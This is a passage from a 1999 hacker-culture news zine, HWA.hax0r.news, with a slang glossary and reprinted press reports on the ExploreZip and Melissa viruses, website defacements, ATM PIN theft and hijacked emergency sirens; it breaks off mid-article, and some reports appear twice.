ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhoress Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Well here we go again, happy samhain to all the pagans out there * happy halloween to everyone else, if you're an uptight christian * then chill a little and have a happy, fun and safe halloween! * * This week we're a little thin, some of you will like this others * will want more of what we've been doing recently, well ya can't * please everyone I guess... check out the fun internet phone * * Cruciphux@dok.org */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Two states tangle with 'cyber terrorist' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Multisync http://www.abcnews.go.com/wire/US/reuters19991025_4522.html WIRE:10/25/1999 21:24:00 ET Two States Tangle With Alleged 'Cyber-Terrorist' BOSTON (Reuters) - Massachusetts Monday charged a 19-year-old Missouri man with guiding young teen-agers to child pornography sites on the Internet and terrorizing a school community. Christian Hunold of Smithville, Missouri faces four child pornography charges along with charges of disorderly conduct, disrupting a school, and threatening to commit assault. Hunold allegedly met children from Hawthorne Brook Middle School in Townsend, Massachusetts in an online chat room and directed them to Internet sites containing pornographic images. He also allegedly sent e-mails threatening to shoot school officials and blow up the building, Massachusetts Attorney General Tom Reilly told reporters. Hunold could be sentenced to 20 years in prison, Reilly said. Hunold remains at his home while Missouri officials continue to investigate, said Scott Holste, a spokesman for Missouri's attorney general. Holste said officials confiscated Hunold's computer equipment Friday. "We have investigators who are working to retrieve information off the computer. That information is going to be looked at to see how it might be addressed under Missouri law," he said. Reilly said he hoped to send a message to Hunold and other would-be "cyber-terrorists." "Our goal is that for anyone who does this, who disrupts a school and terrorizes children and their families and parents, there are going to be consequences," Reilly said. Reilly and Missouri Attorney General Jeremiah Nixon said state laws on the issue were inadequate. Reilly said he planned to meet with federal lawmakers to draft a measure addressing this type of Internet crime. @HWA 04.0 Tempest Information Made Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion A semi-mythical technology, Tempest, is starting to see some daylight. The cypherpunks sent out FOIA requests on TEMPEST documents and they received the first shipment on Friday. They have transcribed these documents and put them on line. Cryptome http://cryptome.org/nsa-reg90-6.htm @HWA 05.0 Virus That Hit Marines Identified ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/s contributed by evilwench The virus that infected Marine Corps HQ computers at the Pentagon last Friday has been identified as Explorer.Zip. Officials have confirmed that this was not any sort of cyber attack. (Explorer.Zip has been around since June which makes one wonder how often the Marines updated their Virus definition files or if they had any protection at all.) CNN http://www.cnn.com/TECH/computing/9910/22/virus/ Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/1025/web-usmc-10-25-99.html CNN; ExploreZip stings Marine Corps HQ October 22, 1999 Web posted at: 4:55 p.m. EDT (2055 GMT) By D. Ian Hopper CNN Interactive Technology Edito The worm that infected computers at the Marine Corps headquarters at the Pentagon early Friday was ExploreZip, an especially malicious virus that typically travels by e-mail, according to a Marine Corps spokesman. Symantec Corporation told CNN that Marine personnel called a technical support line at Symantec to report the outbreak. The outbreak affected unclassified documents, and did not impact any command or control capability, Maj. Dave Lapan said. The outbreak was attributed to a user opening an infected file attachment. "Basically it was an inconvenience to the users who were affected. It just illustrates the hazards of opening files from unknown sources," Lapan said. The Marine Corps has since restored all lost files from backups. The ExploreZip worm replicates itself by mailing itself out to unread messages in Microsoft Outlook, Outlook Express and Exchange. It also searches mapped network drives and other networked computers for installations of Windows. Once found, it copies itself into the Windows directory of the remote machine, according to the Symantec AntiVirus Research Center. The program then destroys a host of files based on file extension, specifically targeting C language code files, Microsoft Word, Excel and PowerPoint files, among others. Rather than simply deleting files - which could then be undeleted - the worm resets the file size to zero bytes, making them much more difficult to recover. In June, an ExploreZip outbreak infected computers at many large businesses, including AT&T, Microsoft, Boeing and General Electric. The worm was first discovered in Israel, and was submitted to Symantec in June. It can be removed using popular anti-virus programs with updated virus definition files ExploreZip stings Marine Corps HQ October 22, 1999 Web posted at: 4:55 p.m. EDT (2055 GMT) By D. Ian Hopper CNN Interactive Technology Edito The worm that infected computers at the Marine Corps headquarters at the Pentagon early Friday was ExploreZip, an especially malicious virus that typically travels by e-mail, according to a Marine Corps spokesman. Symantec Corporation told CNN that Marine personnel called a technical support line at Symantec to report the outbreak. The outbreak affected unclassified documents, and did not impact any command or control capability, Maj. Dave Lapan said. The outbreak was attributed to a user opening an infected file attachment. "Basically it was an inconvenience to the users who were affected. It just illustrates the hazards of opening files from unknown sources," Lapan said. The Marine Corps has since restored all lost files from backups. The ExploreZip worm replicates itself by mailing itself out to unread messages in Microsoft Outlook, Outlook Express and Exchange. It also searches mapped network drives and other networked computers for installations of Windows. Once found, it copies itself into the Windows directory of the remote machine, according to the Symantec AntiVirus Research Center. The program then destroys a host of files based on file extension, specifically targeting C language code files, Microsoft Word, Excel and PowerPoint files, among others. Rather than simply deleting files - which could then be undeleted - the worm resets the file size to zero bytes, making them much more difficult to recover. In June, an ExploreZip outbreak infected computers at many large businesses, including AT&T, Microsoft, Boeing and General Electric. The worm was first discovered in Israel, and was submitted to Symantec in June. It can be removed using popular anti-virus programs with updated virus definition files -=- FCW; OCTOBER 25, 1999 Marines say virus incident not an attack BY DANIEL VERTON (dan_verton@fcw.com) The computer virus that found its way onto the network at Marine Corps headquarters in the Pentagon last week is not the result of a deliberate or sustained cyberattack, officials confirmed Friday. Senior officials involved in intelligence and command and control at Marine Corps headquarters characterized the incident as localized and minor. Officials identified the virus as the ExploreZip worm virus. Worm viruses, such as ExploreZip, replicate themselves quickly throughout infected systems and networks and then delete files critical to the operation of various Microsoft Windows-based applications. "We have a better-than-average system for [computer network defense] using detection systems, firewalls and virus scans," said one senior official, who spoke on condition of anonymity. "But if you get the right combination of operator or system administrator errors lined up with the right unsafe practice by a user, something like this can get on the network," the official said. "It wasn't that big of a deal, and we're not sure why it rated even a news clip." Capt. Pete Mitchell, a Marine Corps spokesman, said an unknown type of worm virus attached to an e-mail infected the shared hard drives on three unclassified servers, hitting Microsoft Corp.-based applications particularly hard. "While it was more of an inconvenience than anything else, it was a reminder of the hazards [associated] with opening e-mails with attachments from unknown sources," Mitchell said. The incident raised eyebrows, however, coming as new variants of the "Melissa" virus recently have been identified throughout the country. Melissa, which appeared in March on networks throughout government and private industry, forced the Marine Corps to shut down its base-to-base e-mail system for several days until system administrators could ensure the virus had been eliminated [FCW, March 30]. @HWA 06.0 Love sick hacker hits Microsoft hard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Lovesick hacker hits Microsoft site Vandalism is first known defacement of company Web page By Mike Brunker MSNBC Oct. 26 Earning a footnote in the annals of computer vandalism, a lovesick hacker known as flipz on Tuesday became the first person known to have defaced one of Microsoft Corp.’s Web sites. The hacker, who also altered a handful of government Web sites in recent days, says he expects to be arrested soon. “Its (sic) all about fun till the feds bust down the door,” a message left on one of the defaced Web sites said. THE DEFACEMENT of Microsoft’s Conference Management Server site was documented by attrition.org, a reliable computer security site that maintains an archive of hacked Web sites. Microsoft did not respond to calls seeking comment on the attack. But a company source who spoke on condition of anonymity, confirmed that the hacker had commandeered a company-owned computer. However, the source said, the hacked machines were not part of Microsoft’s corporate network, but rather part of a “direct tap network” used by developers and partners for testing purposes. These computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the source said. (MSNBC is a joint-partnership between Microsoft and NBC News.) Representatives of two government Web sites hacked by “flipz” — the Department of Veterans Affairs and the White Sands Missile Range in New Mexico — confirmed that attrition.org’s account of the vandalism of their sites was accurate. PART LOVE NOTE, PART THREAT On Monday, the hacker replaced Microsoft’s Conference Management Server home page, which was not accessible Tuesday morning, with a message that was part love letter and part threat, attrition.org reported. “flipz was here and f0bic, your seksi (sic) voice helped me through the night,” it read in part before concluding with a threat against Microsoft CEO Bill Gates. B.K. DeLong, curator of the attrition.org Web defacement archive, said research of other hacking mirror sites — which use a computer’s “screen grab” function to document vandalized Web sites — indicates that this is the first time Microsoft has been victimized. “This is the first time that we’ve been publicly notified (about a hacking claim against Microsoft) ... and to build our mirror we borrowed mirrors from other sites,” he said. All of the recent hacked pages were accessed through Microsoft NT servers, attrition.org said. OTHER SITES AFFECTED? The hack appeared to impact a series of Internet domains Microsoft maintains outside its standard corporate presence on the Net. As of Tuesday morning, at least six sites registered to Microsoft weren’t functioning, though some may have been removed prior to the hack. While most Microsoft corporate site IP addresses start with 207, the hacked page started with 131. On Tuesday, all Microsoft sites between 131.107.65.0 and 131.107.65.20 weren’t functioning. These likely were all hosted on the same server, which apparently was offline. The impacted Web pages appear to be conference information sites, including “icassp.microsoft.com,” “isys.microsoft.com,” and “cuai-97.microsoft.com.” Another non-functioning site was “uncertainty.microsoft.com.” The purpose of that site was not known. A PROMINENT TARGET Microsoft has long been a prominent target of hackers. The 2600 Web site, the online home of a hackers’ magazine, has the Redmond, Wash., company prominently listed on a page of “Hacked Sites of the Future.” But DeLong said he wasn’t aware of any competition to break into Microsoft’s computers. “I haven’t really heard people saying, ‘Ooh, I’m going to hack Microsoft!’ Part of it may be that they think they can’t get in or ... that they fear retribution from Microsoft,” he said. DeLong said “flipz” first came to his attention in March, when he reported he had hacked a Web page operated by NASA’s Jet Propulsion Laboratory. The hacker added attacks on Duracell Corp. in June and People’s Bank of Connecticut in September to his resume before the recent spate of attacks, which began Wednesday. According to attrition.org, “flipz” altered the University of California at Riverside Police Department’s Web site that day before turning to government targets, knocking off, in rapid succession, the homepages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs. HACKER LOVE? The love notes that “flipz” left on three of the defaced sites suggest that the hacker has a crush on a fellow computer intruder. A person using the hacking handle “f0bic” is a member of “Team Spl0it,” a hacking group that retaliated for the FBI’s arrest in September of alleged hacker Chad Davis by vandalizing several Web sites. Davis, a 19-year-old Green Bay, Wis., resident, is accused of breaking into a U.S. Army computer at the Pentagon. According to a federal complaint filed at the time of his arrest, Davis is a founder and leader of the “Global Hell” hacking group, which vandalized White House, FBI and U.S. Senate Web sites earlier this year. The FBI did not respond to a query about whether “flipz” hacking attacks were under investigation, but DeLong said the hacker expects to be arrested before long. “flipz said he doesn’t care if the feds come and get him,” DeLong said. “He’s expecting to get picked up, but he’s going to have fun while he’s waiting.” MSNBC technology writer Bob Sullivan contributed to this report. THE DEFACEMENT of Microsoft’s Conference Management Server site was documented by attrition.org, a reliable computer security site that maintains an archive of hacked Web sites. Microsoft did not respond to calls seeking comment on the attack. But a company source who spoke on condition of anonymity, confirmed that the hacker had commandeered a company-owned computer. However, the source said, the hacked machines were not part of Microsoft’s corporate network, but rather part of a “direct tap network” used by developers and partners for testing purposes. These computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the source said. (MSNBC is a joint-partnership between Microsoft and NBC News.) Representatives of two government Web sites hacked by “flipz” — the Department of Veterans Affairs and the White Sands Missile Range in New Mexico — confirmed that attrition.org’s account of the vandalism of their sites was accurate. PART LOVE NOTE, PART THREAT On Monday, the hacker replaced Microsoft’s Conference Management Server home page, which was not accessible Tuesday morning, with a message that was part love letter and part threat, attrition.org reported. “flipz was here and f0bic, your seksi (sic) voice helped me through the night,” it read in part before concluding with a threat against Microsoft CEO Bill Gates. B.K. DeLong, curator of the attrition.org Web defacement archive, said research of other hacking mirror sites — which use a computer’s “screen grab” function to document vandalized Web sites — indicates that this is the first time Microsoft has been victimized. “This is the first time that we’ve been publicly notified (about a hacking claim against Microsoft) ... and to build our mirror we borrowed mirrors from other sites,” he said. All of the recent hacked pages were accessed through Microsoft NT servers, attrition.org said. OTHER SITES AFFECTED? The hack appeared to impact a series of Internet domains Microsoft maintains outside its standard corporate presence on the Net. As of Tuesday morning, at least six sites registered to Microsoft weren’t functioning, though some may have been removed prior to the hack. While most Microsoft corporate site IP addresses start with 207, the hacked page started with 131. On Tuesday, all Microsoft sites between 131.107.65.0 and 131.107.65.20 weren’t functioning. These likely were all hosted on the same server, which apparently was offline. The impacted Web pages appear to be conference information sites, including “icassp.microsoft.com,” “isys.microsoft.com,” and “cuai-97.microsoft.com.” Another non-functioning site was “uncertainty.microsoft.com.” The purpose of that site was not known. A PROMINENT TARGET Microsoft has long been a prominent target of hackers. The 2600 Web site, the online home of a hackers’ magazine, has the Redmond, Wash., company prominently listed on a page of “Hacked Sites of the Future.” But DeLong said he wasn’t aware of any competition to break into Microsoft’s computers. “I haven’t really heard people saying, ‘Ooh, I’m going to hack Microsoft!’ Part of it may be that they think they can’t get in or ... that they fear retribution from Microsoft,” he said. DeLong said “flipz” first came to his attention in March, when he reported he had hacked a Web page operated by NASA’s Jet Propulsion Laboratory. The hacker added attacks on Duracell Corp. in June and People’s Bank of Connecticut in September to his resume before the recent spate of attacks, which began Wednesday. According to attrition.org, “flipz” altered the University of California at Riverside Police Department’s Web site that day before turning to government targets, knocking off, in rapid succession, the homepages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs. HACKER LOVE? The love notes that “flipz” left on three of the defaced sites suggest that the hacker has a crush on a fellow computer intruder. A person using the hacking handle “f0bic” is a member of “Team Spl0it,” a hacking group that retaliated for the FBI’s arrest in September of alleged hacker Chad Davis by vandalizing several Web sites. Davis, a 19-year-old Green Bay, Wis., resident, is accused of breaking into a U.S. Army computer at the Pentagon. According to a federal complaint filed at the time of his arrest, Davis is a founder and leader of the “Global Hell” hacking group, which vandalized White House, FBI and U.S. Senate Web sites earlier this year. The FBI did not respond to a query about whether “flipz” hacking attacks were under investigation, but DeLong said the hacker expects to be arrested before long. “flipz said he doesn’t care if the feds come and get him,” DeLong said. “He’s expecting to get picked up, but he’s going to have fun while he’s waiting.” MSNBC technology writer Bob Sullivan contributed to this report. @HWA 07.0 Russian ATMs Compromised ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Bank ATMs in Moscow seem to have been compromised by intruders who are stealing pin numbers, and therefore money, from peoples' accounts. It is unclear how this theft is occurring or how many people have been affected but it is believed that the criminals are intercepting communication between the ATM and the bank. Russia Today http://www.russiatoday.com/frames/frames.php3?url=http%3A%2F%2Fwww.sptimes.ru%2Fcurrent%2Fpin.htm (Requires paid registration :( ) 58% >>>>> #511, OCTOBER 22, 1999 Top Story (PIN Code Hackers Rip Off Moscow) - PIN Code Hackers Rip Off Moscow By Brian Humphreys| MOSCOW - Hundreds of expatriates have received letters from their banks abroad warning them that their bank cards have been compromised by someone able to steal PIN codes through Moscow's ATM machines - and according to card payment system officials, the theft of PIN codes now underway in Russia ***** http://www.sptimes.ru/archive/times/511/pin.htm @HWA 08.0 Kentucky Emergency Sirens Activated - Hacker Blamed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Somehow something that has absolutely nothing at all to do with hacking has been blamed on hackers. Emergency warning sirens in Boone County, Kentucky have been activated by a random prankster. This was done by duplicating the radio signals needed to activate the system. (They don't have an off switch?) This nefarious activity was blamed on the evil "hacker". APB Online http://www.apbnews.com/newscenter/breakingnews/1999/10/22/sirens1022_01.html Hacker Attacks Ky. County's Weather Sirens Activation Tones Cloned to Trigger Alarm Oct. 22, 1999 By David Noack BURLINGTON, Ky. (APBnews.com) -- The Boone County early warning weather system that alerts residents to a threatening storm or a tornado has been sabotaged by someone who has cloned the tones needed to trigger the alarm. Over the last few weeks, 29 sirens scattered across this rural Kentucky county have gone off, prompting a flood of phone calls to the police, they said. "Our outdoor emergency sirens have been activated at odd hours, such as 1 a.m. and at 7 a.m. on a recent Saturday. These did not come from our central dispatch. It had to come from a remote location, either a fixed site or a mobile [site], and we believe at this point that it came from a mobile site," said Bill Appleby, the county's emergency management director. 'Someone has a hand-held radio' Officials believe that someone is driving around the county with the electronic equipment and activating the warning system. Officials don't know whether this is the work of a former employee or just someone using electronic gear to pluck the tones out of the air. "They would probably not be able to do it through a personal computer. It's a radio wave transmission, so they would have to have access to our radio frequencies. What we think at this point is that someone has taped or copied our tones in some manner, and we think it's a mobile unit where someone has a hand-held radio and travels around," said Appleby, who added that sirens in neighboring Kenton County also have been set off. He said that when dispatchers would try to turn off the sirens, another series of tones would then reactivate them. The sirens have blared for more than 20 minutes, but are only suppose to go off in three- to five-minute bursts. Appleby fears the sirens may get damaged since they are not designed to run longer than a few minutes at a time. The sirens sit atop poles and include an antenna so they can receive the activation tones from dispatchers. Seeking an electronic footprint The Boone County police are investigating the incidents, and the Federal Communications Commission has been notified. Appleby said that since the sirens are meant to alert residents to some kind of danger, their random activation is causing anxiety in some people. He said starting this weekend they would be trying to track the culprit making the calls. "We are hoping to get an electronic footprint from someone who may be activating a radio, either a base or mobile, see which one of our towers activates first, and then we would know at least the general vicinity," said Appleby. Tape-recording tones will not work He said the sirens are tested on a monthly basis and the public is notified. It's then that the tones, using the right equipment, can be captured. Steve Makky Sr., an emergency coordinator and communications and warning officer for a Missouri emergency agency, said it's possible to buy or modify a radio that can be programmed to mimic the correct tones. But he said that activating an outdoor warning device, or OWD, is not that easy and requires some sophistication. "Many of the OWDs have microprocessor filters that require precise-activating tone frequencies [similar to touch tones] and timing duration. The difference of one millisecond will not activate the OWD. Simply tape-recording and replaying these will usually not work," Makky said. Expanding outdoor warning system Makky continued: "The act usually involves transmitting on unauthorized radio frequencies and most do this on a somewhat frequent basis. Some agencies have communications specialists or agreements with ham radio operators to track down 'jammers.' Such an effort usually requires a specialized radio direction finding apparatus and prior experience using it." Boone County's emergency management department is responsible for the planning and coordination of unified emergency response to any disaster or emergency situation in the county, dealing with severe weather, flooding, fire, explosions, power failures, riots, hazardous material incidents and any other natural or man-made emergencies. A major project of the office is the expansion of the outdoor warning system. Funding has been approved to purchase 12 additional outdoor warning sirens to be added to the existing warning sirens. These sirens are being installed to expand the warning coverage area, especially near areas where outdoor activities take place. Activation of the sirens occurs when an actual sighting of a tornado or funnel cloud is confirmed, or when the National Weather Service issues a warning for the county. The sirens may also be activated at the discretion of the emergency management office under certain conditions or for other public emergencies. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 09.0 Over 24 Variants of Melissa Found With More to Come ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex There are over 24 variations of the Melissa virus now in existence. Melissa.U[Gen1] is the latest variant which has infected over 40,000 hosts. Experts fear that many more variations are on the horizon. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html?chkpt=zdnntop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Melissa finds more fertile ground By Jim Kerstetter, PC Week October 22, 1999 1:09 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html IT managers wondering why variants of the Melissa virus are proliferating need only look to the field of agriculture for the answer. Farmers know that too much of the same crop is a recipe for disaster. A blight -- a virus -- can wipe out an entire field in no time. Experts call it a monoculture. And that's what the computing environment has become: a monoculture of Windows desktops, connected by Visual Basic programming and Microsoft Office suite macro commands that are easily exploited by willful programmers. Melissa, which spawned in March, now circulates in about 24 versions. Two more Melissa variants popped up this month; the latest, Melissa.U (Gen1), eluded the most sophisticated anti-virus software. Experts warn many more will come. Low barriers to entry "Macro viruses such as Melissa are extremely easy to write," said Carey Nachenberg, chief researcher at Symantec Corp.'s Antivirus Research Center, in Santa Monica, Calif. "Anybody with a manual and a free afternoon could probably write one." Melissa.U (Gen1) infected at least 40,000 nodes at five companies. The original Melissa grabbed the top 50 addresses off a user's Outlook address book after an infected attachment was opened and started a chain reaction that overloaded servers across the country. A variant, Melissa.U, grabbed only four addresses. But its impact was more severe, wiping out important system commands such as I/O.sys. Melissa.U (Gen1) is a further variation on that virus. "This was the first of the Melissas to get past our virus software," said Alan Hamilton, IS manager at a West Coast software company. "I guess our saving grace was, for once, people didn't open it." Just how Melissa.U (Gen1) was created is still a mystery. Most good anti-virus software can catch variants of Melissa using two common detection methods. The first is based on the virus' signature, a piece of code that is unique to that virus. Signature recognition is easy for virus authors to avoid, however. Change a piece of the signature, without actually changing the virus functions, and the signature recognition defense becomes moot. That's why anti-virus software vendors constantly send out software updates. The second method, called heuristics, isn't so easy to avoid. Heuristic software, which is in use by most major anti-virus software vendors, looks for how a virus behaves -- for example, what dynamic link libraries it writes to -- rather than its specific qualities. Heuristic software, for the most part, has caught Melissa variants. A novel twist But Melissa.U (Gen1) didn't behave like the previous forms of Melissa. It used Messaging API commands for opening Outlook address books differently than a typical Melissa variant. Experts are speculating why this happened. It could be because the virus writers who set it loose were a bit more creative than were the original writers, or anti-virus software never fully eradicated the initial Melissa.U strain, according to experts. And there's no reason that won't happen again. Macro commands, by their nature, are easy to work with. Melissa, which feeds off the macros in Microsoft software, is easy to tinker with. Probably the most disturbing thing about Melissa is its worm exploit -- that is, it has the ability to proliferate more quickly. In addition, it can be easily mutated even by amateur virus writers. Melissa hit the industry's most popular, yet vulnerable software -- 